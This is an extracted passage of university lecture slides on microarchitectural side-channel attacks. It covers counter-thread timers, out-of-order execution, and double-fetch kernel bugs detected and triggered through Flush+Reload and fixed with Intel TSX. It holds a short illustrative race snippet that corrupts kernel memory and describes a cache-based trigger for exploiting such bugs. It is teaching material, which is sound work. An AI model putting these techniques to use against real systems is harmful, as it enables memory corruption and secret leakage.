![Page 137: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/137.jpg)
Timer www.tugraz.at
• We can build our own timer [Lip+16; Sch+17]
• Start a thread that continuously increments a global variable
• The global variable is our timestamp
26 Daniel Gruss — Graz University of Technology
![Page 138: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/138.jpg)
Timer www.tugraz.at
• We can build our own timer [Lip+16; Sch+17]
• Start a thread that continuously increments a global variable
• The global variable is our timestamp
26 Daniel Gruss — Graz University of Technology
![Page 139: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/139.jpg)
![Page 140: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/140.jpg)
![Page 141: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/141.jpg)
Self-built Timer www.tugraz.at
CPU cycles one increment takes
Optimized
Assembly
C
rdtsc 3
4.7
4.67
0.87
3 1 t imestamp = r d t s c ( ) ;
27 Daniel Gruss — Graz University of Technology
![Page 142: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/142.jpg)
Self-built Timer www.tugraz.at
CPU cycles one increment takes
Optimized
Assembly
C
rdtsc 3
4.7
4.67
0.87
3
4.7
1 whi le ( 1 ) {2 t imestamp++;
3 }
27 Daniel Gruss — Graz University of Technology
![Page 143: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/143.jpg)
Self-built Timer www.tugraz.at
CPU cycles one increment takes
Optimized
Assembly
C
rdtsc 3
4.7
4.67
0.87
3
4.7
4.67
1 mov ×tamp , %rcx
2 1 : i n c l (% rcx )
3 jmp 1b
27 Daniel Gruss — Graz University of Technology
![Page 144: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/144.jpg)
Self-built Timer www.tugraz.at
CPU cycles one increment takes
Optimized
Assembly
C
rdtsc 3
4.7
4.67
0.87
3
4.7
4.67
0.87
1 mov ×tamp , %rcx
2 1 : i n c %rax
3 mov %rax , (% rcx )
4 jmp 1b
27 Daniel Gruss — Graz University of Technology
![Page 145: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/145.jpg)
![Page 146: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/146.jpg)
Out-of-Order Execution www.tugraz.at
Exe
cutio
nE
ngin
e
Reorder buffer
µOP µOP µOP µOP µOP µOP µOP µOP
Scheduler
Execution Units
AL
U,A
ES,
...
AL
U,F
MA
,...
AL
U,V
ect,
...
AL
U,B
ranc
h
Loa
dda
ta
Loa
dda
ta
Stor
eda
ta
AG
U
µOP µOP µOP µOP µOP µOP µOP µOP
CDB
Mem
ory
Subs
yste
m Load Buffer Store Buffer
L1 Data CacheDTLB STLB
L2 Cache
Fron
tend
Allocation Queue
µOP µOP µOP µOP
MUX
4-Way Decode
µOP µOP µOP µOP
Instruction Queue
Instruction Fetch & PreDecode
µOP Cache
µOPs
BranchPredictor
L1 Instruction CacheITLB
Instructions are
• fetched and decoded in the front-end
• dispatched to the backend
• processed by individual execution units
28 Daniel Gruss — Graz University of Technology
![Page 147: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/147.jpg)
Out-of-Order Execution www.tugraz.at
Exe
cutio
nE
ngin
e
Reorder buffer
µOP µOP µOP µOP µOP µOP µOP µOP
Scheduler
Execution Units
AL
U,A
ES,
...
AL
U,F
MA
,...
AL
U,V
ect,
...
AL
U,B
ranc
h
Loa
dda
ta
Loa
dda
ta
Stor
eda
ta
AG
U
µOP µOP µOP µOP µOP µOP µOP µOP
CDB
Mem
ory
Subs
yste
m Load Buffer Store Buffer
L1 Data CacheDTLB STLB
L2 Cache
Fron
tend
Allocation Queue
µOP µOP µOP µOP
MUX
4-Way Decode
µOP µOP µOP µOP
Instruction Queue
Instruction Fetch & PreDecode
µOP Cache
µOPs
BranchPredictor
L1 Instruction CacheITLB
Instructions are
• fetched and decoded in the front-end
• dispatched to the backend
• processed by individual execution units
28 Daniel Gruss — Graz University of Technology
![Page 148: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/148.jpg)
Out-of-Order Execution www.tugraz.at
Exe
cutio
nE
ngin
e
Reorder buffer
µOP µOP µOP µOP µOP µOP µOP µOP
Scheduler
Execution Units
AL
U,A
ES,
...
AL
U,F
MA
,...
AL
U,V
ect,
...
AL
U,B
ranc
h
Loa
dda
ta
Loa
dda
ta
Stor
eda
ta
AG
U
µOP µOP µOP µOP µOP µOP µOP µOP
CDB
Mem
ory
Subs
yste
m Load Buffer Store Buffer
L1 Data CacheDTLB STLB
L2 Cache
Fron
tend
Allocation Queue
µOP µOP µOP µOP
MUX
4-Way Decode
µOP µOP µOP µOP
Instruction Queue
Instruction Fetch & PreDecode
µOP Cache
µOPs
BranchPredictor
L1 Instruction CacheITLB
Instructions are
• fetched and decoded in the front-end
• dispatched to the backend
• processed by individual execution units
28 Daniel Gruss — Graz University of Technology
![Page 149: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/149.jpg)
Temporal Component www.tugraz.at
• trace over time contains information
• single spikes contain information
• can’t arbitrarily improve clock
• microarchitectural attacks somewhat similar to SPA
→ single spike can already reveal a secret
29 Daniel Gruss — Graz University of Technology
![Page 150: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/150.jpg)
Temporal Component www.tugraz.at
• trace over time contains information
• single spikes contain information
• can’t arbitrarily improve clock
• microarchitectural attacks somewhat similar to SPA
→ single spike can already reveal a secret
29 Daniel Gruss — Graz University of Technology
![Page 151: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/151.jpg)
Temporal Component www.tugraz.at
• trace over time contains information
• single spikes contain information
• can’t arbitrarily improve clock
• microarchitectural attacks somewhat similar to SPA
→ single spike can already reveal a secret
29 Daniel Gruss — Graz University of Technology
![Page 152: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/152.jpg)
Temporal Component www.tugraz.at
• trace over time contains information
• single spikes contain information
• can’t arbitrarily improve clock
• microarchitectural attacks somewhat similar to SPA
→ single spike can already reveal a secret
29 Daniel Gruss — Graz University of Technology
![Page 153: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/153.jpg)
Temporal Component www.tugraz.at
• trace over time contains information
• single spikes contain information
• can’t arbitrarily improve clock
• microarchitectural attacks somewhat similar to SPA
→ single spike can already reveal a secret
29 Daniel Gruss — Graz University of Technology
![Page 154: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/154.jpg)
Temporal Component www.tugraz.at
• trace over time contains information
• single spikes contain information
• can’t arbitrarily improve clock
• microarchitectural attacks somewhat similar to SPA
→ single spike can already reveal a secret
29 Daniel Gruss — Graz University of Technology
![Page 155: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/155.jpg)
Case Study: Double Fetches www.tugraz.at
• “time-of-check-to-time-of-use”
• Caused by accessing the shared memory twice
• Double-fetch bugs = exploitable double fetches
• Can microarchitectural attacks help here?
30 Daniel Gruss — Graz University of Technology
![Page 156: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/156.jpg)
Case Study: Double Fetches www.tugraz.at
• “time-of-check-to-time-of-use”
• Caused by accessing the shared memory twice
• Double-fetch bugs = exploitable double fetches
• Can microarchitectural attacks help here?
30 Daniel Gruss — Graz University of Technology
![Page 157: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/157.jpg)
Case Study: Double Fetches www.tugraz.at
• “time-of-check-to-time-of-use”
• Caused by accessing the shared memory twice
• Double-fetch bugs = exploitable double fetches
• Can microarchitectural attacks help here?
30 Daniel Gruss — Graz University of Technology
![Page 158: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/158.jpg)
Case Study: Double Fetches www.tugraz.at
• “time-of-check-to-time-of-use”
• Caused by accessing the shared memory twice
• Double-fetch bugs = exploitable double fetches
• Can microarchitectural attacks help here?
30 Daniel Gruss — Graz University of Technology
![Page 159: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/159.jpg)
Case Study: Double Fetches www.tugraz.at
• “time-of-check-to-time-of-use”
• Caused by accessing the shared memory twice
• Double-fetch bugs = exploitable double fetches
• Can microarchitectural attacks help here?
30 Daniel Gruss — Graz University of Technology
![Page 160: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/160.jpg)
Case Study: Double Fetches www.tugraz.at
• “time-of-check-to-time-of-use”
• Caused by accessing the shared memory twice
• Double-fetch bugs = exploitable double fetches
• Can microarchitectural attacks help here?
30 Daniel Gruss — Graz University of Technology
![Page 161: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/161.jpg)
Case Study: Double Fetches www.tugraz.at
• “time-of-check-to-time-of-use”
• Caused by accessing the shared memory twice
• Double-fetch bugs = exploitable double fetches
• Can microarchitectural attacks help here?
30 Daniel Gruss — Graz University of Technology
![Page 162: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/162.jpg)
A Double Fetch www.tugraz.at
string
31 Daniel Gruss — Graz University of Technology
![Page 163: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/163.jpg)
A Double Fetch www.tugraz.at
string
/ p a t h / f i l e \0 p a y l o a d \0
length
Thread 1strcpy(string , "/path/file\0 payload");
open(string , O_CREAT);
Thread 2
31 Daniel Gruss — Graz University of Technology
![Page 164: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/164.jpg)
A Double Fetch www.tugraz.at
string
/ p a t h / f i l e \0 p a y l o a d \0
length
Thread 1strcpy(string , "/path/file\0 payload");
open(string , O_CREAT);
// <switch to kernel >
Thread 2
31 Daniel Gruss — Graz University of Technology
![Page 165: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/165.jpg)
A Double Fetch www.tugraz.at
string
/ p a t h / f i l e \0 p a y l o a d \0
length
Thread 1strcpy(string , "/path/file\0 payload");
open(string , O_CREAT);
// <switch to kernel >
int len = strlen(string);
char* local = malloc(len + 1);
Thread 2
31 Daniel Gruss — Graz University of Technology
![Page 166: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/166.jpg)
A Double Fetch www.tugraz.at
string
/ p a t h / f i l e X p a y l o a d \0
length
Thread 1strcpy(string , "/path/file\0 payload");
open(string , O_CREAT);
// <switch to kernel >
int len = strlen(string);
char* local = malloc(len + 1);
Thread 2
schedulestring [10] = ’X’;
31 Daniel Gruss — Graz University of Technology
![Page 167: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/167.jpg)
A Double Fetch www.tugraz.at
string
/ p a t h / f i l e X p a y l o a d \0
length
Thread 1strcpy(string , "/path/file\0 payload");
open(string , O_CREAT);
// <switch to kernel >
int len = strlen(string);
char* local = malloc(len + 1);
strcpy(local , string);
// <memory corruption >
Thread 2
schedule string [10] = ’X’;
31 Daniel Gruss — Graz University of Technology
![Page 168: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/168.jpg)
Microarchitectural Attacks to the Rescue! www.tugraz.at
• Idea: memory access can be observed through the cache
• Observe cache activity using a cache attack
32 Daniel Gruss — Graz University of Technology
![Page 169: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/169.jpg)
Microarchitectural Attacks to the Rescue! www.tugraz.at
• Idea: memory access can be observed through the cache
• Observe cache activity using a cache attack
32 Daniel Gruss — Graz University of Technology
![Page 170: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/170.jpg)
DECAF4 www.tugraz.at
DECAF
(Syscall) Fuzzer
Exploit double fetch
Report
general bug
Detect double fetches
Double fetch
candidates
Report double-
fetch bugFix double-fetch bug
4Michael Schwarz et al. Automated Detection, Exploitation, and Elimination of Double-Fetch Bugs
using Modern CPU Features. In: AsiaCCS (2018).
33 Daniel Gruss — Graz University of Technology
![Page 171: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/171.jpg)
DECAF4 www.tugraz.at
DECAF(Syscall) Fuzzer
Exploit double fetch
Report
general bug
Detect double fetches
Double fetch
candidates
Report double-
fetch bugFix double-fetch bug
4Michael Schwarz et al. Automated Detection, Exploitation, and Elimination of Double-Fetch Bugs
using Modern CPU Features. In: AsiaCCS (2018).
33 Daniel Gruss — Graz University of Technology
![Page 172: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/172.jpg)
DECAF4 www.tugraz.at
DECAF(Syscall) Fuzzer
Exploit double fetch
Report
general bug
Detect double fetches
Double fetch
candidates
Report double-
fetch bugFix double-fetch bug
4Michael Schwarz et al. Automated Detection, Exploitation, and Elimination of Double-Fetch Bugs
using Modern CPU Features. In: AsiaCCS (2018).
33 Daniel Gruss — Graz University of Technology
![Page 173: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/173.jpg)
DECAF4 www.tugraz.at
DECAF(Syscall) Fuzzer
Exploit double fetch
Report
general bug
Detect double fetches
Double fetch
candidates
Report double-
fetch bugFix double-fetch bug
4Michael Schwarz et al. Automated Detection, Exploitation, and Elimination of Double-Fetch Bugs
using Modern CPU Features. In: AsiaCCS (2018).
33 Daniel Gruss — Graz University of Technology
![Page 174: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/174.jpg)
DECAF4 www.tugraz.at
DECAF(Syscall) Fuzzer Exploit double fetch
Report
general bug
Detect double fetches
Double fetch
candidates
Report double-
fetch bugFix double-fetch bug
4Michael Schwarz et al. Automated Detection, Exploitation, and Elimination of Double-Fetch Bugs
using Modern CPU Features. In: AsiaCCS (2018).
33 Daniel Gruss — Graz University of Technology
![Page 175: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/175.jpg)
DECAF4 www.tugraz.at
DECAF(Syscall) Fuzzer Exploit double fetch
Report
general bug
Detect double fetches
Double fetch
candidates
Report double-
fetch bug
Fix double-fetch bug
4Michael Schwarz et al. Automated Detection, Exploitation, and Elimination of Double-Fetch Bugs
using Modern CPU Features. In: AsiaCCS (2018).
33 Daniel Gruss — Graz University of Technology
![Page 176: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/176.jpg)
DECAF4 www.tugraz.at
DECAF(Syscall) Fuzzer Exploit double fetch
Report
general bug
Detect double fetches
Double fetch
candidates
Report double-
fetch bugFix double-fetch bug
4Michael Schwarz et al. Automated Detection, Exploitation, and Elimination of Double-Fetch Bugs
using Modern CPU Features. In: AsiaCCS (2018).
33 Daniel Gruss — Graz University of Technology
![Page 177: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/177.jpg)
Detection via Flush+Reload www.tugraz.at
0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 1.1
·106
200
220
240
260
Runtime [cycles]
Acc
ess
tim
e[c
ycle
s]
34 Daniel Gruss — Graz University of Technology
![Page 178: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/178.jpg)
Detection via Flush+Reload www.tugraz.at
0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 1.1
·106
200
220
240
260
Runtime [cycles]
Acc
ess
tim
e[c
ycle
s]
Data was accessed
34 Daniel Gruss — Graz University of Technology
![Page 179: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/179.jpg)
Detection via Flush+Reload www.tugraz.at
0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1
·106
200
220
240
260
Runtime [cycles]
Acc
ess
tim
e[c
ycle
s]
35 Daniel Gruss — Graz University of Technology
![Page 180: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/180.jpg)
Detection via Flush+Reload www.tugraz.at
0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1
·106
200
220
240
260
Runtime [cycles]
Acc
ess
tim
e[c
ycle
s]
First access
35 Daniel Gruss — Graz University of Technology
![Page 181: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/181.jpg)
Detection via Flush+Reload www.tugraz.at
0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1
·106
200
220
240
260
Runtime [cycles]
Acc
ess
tim
e[c
ycle
s]
First access Second access
35 Daniel Gruss — Graz University of Technology
![Page 182: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/182.jpg)
Double-fetch Bug Exploitation www.tugraz.at
• Only double-fetch bugs are interesting
→ exploit while fuzzing
• Flip value as fast as possible?
• Better use a trigger (just like in physical fault attacks!)
36 Daniel Gruss — Graz University of Technology
![Page 183: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/183.jpg)
Double-fetch Bug Exploitation www.tugraz.at
• Only double-fetch bugs are interesting
→ exploit while fuzzing
• Flip value as fast as possible?
• Better use a trigger (just like in physical fault attacks!)
36 Daniel Gruss — Graz University of Technology
![Page 184: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/184.jpg)
Double-fetch Bug Exploitation www.tugraz.at
• Only double-fetch bugs are interesting
→ exploit while fuzzing
• Flip value as fast as possible?
• Better use a trigger (just like in physical fault attacks!)
36 Daniel Gruss — Graz University of Technology
![Page 185: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/185.jpg)
Double-fetch Bug Exploitation www.tugraz.at
• Only double-fetch bugs are interesting
→ exploit while fuzzing
• Flip value as fast as possible?
• Better use a trigger
(just like in physical fault attacks!)
36 Daniel Gruss — Graz University of Technology
![Page 186: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/186.jpg)
Double-fetch Bug Exploitation www.tugraz.at
• Only double-fetch bugs are interesting
→ exploit while fuzzing
• Flip value as fast as possible?
• Better use a trigger (just like in physical fault attacks!)
36 Daniel Gruss — Graz University of Technology
![Page 187: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/187.jpg)
Cache-based Trigger www.tugraz.at
3 3.5 4 4.5 5 5.5 6 6.5 7
·105
200
220
240
260
Runtime [cycles]
Acc
ess
tim
e
[cyc
les]
37 Daniel Gruss — Graz University of Technology
![Page 188: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/188.jpg)
Cache-based Trigger www.tugraz.at
3 3.5 4 4.5 5 5.5 6 6.5 7
·105
200
220
240
260
Runtime [cycles]
Acc
ess
tim
e
[cyc
les]
First access
37 Daniel Gruss — Graz University of Technology
![Page 189: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/189.jpg)
Cache-based Trigger www.tugraz.at
3 3.5 4 4.5 5 5.5 6 6.5 7
·105
200
220
240
260
Runtime [cycles]
Acc
ess
tim
e
[cyc
les]
First access Modify value
37 Daniel Gruss — Graz University of Technology
![Page 190: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/190.jpg)
Cache-based Trigger www.tugraz.at
3 3.5 4 4.5 5 5.5 6 6.5 7
·105
200
220
240
260
Runtime [cycles]
Acc
ess
tim
e
[cyc
les]
First access Modify value Second access with modified value
37 Daniel Gruss — Graz University of Technology
![Page 191: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/191.jpg)
Cache-based Trigger www.tugraz.at
0 50 100 150 200 250 300 350 400 450 500 550 6000
25
50
75
100
Access delta [cycles]
Pro
bab
ility
[%]
Flush+Reload Flipping
38 Daniel Gruss — Graz University of Technology
![Page 192: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/192.jpg)
Cache-based Trigger www.tugraz.at
1 2 3 40
25
50
75
100
Number of checks
Pro
bab
ility
[%]
Flush+Reload
Flipping
39 Daniel Gruss — Graz University of Technology
![Page 193: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/193.jpg)
Getting rid of Double Fetch Bugs www.tugraz.at
• Problem: modified value → exploit
• Idea: Ensure that both accesses are atomic
→ Another microarchitectural feature: Intel TSX
40 Daniel Gruss — Graz University of Technology
![Page 194: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/194.jpg)
Getting rid of Double Fetch Bugs www.tugraz.at
• Problem: modified value → exploit
• Idea: Ensure that both accesses are atomic
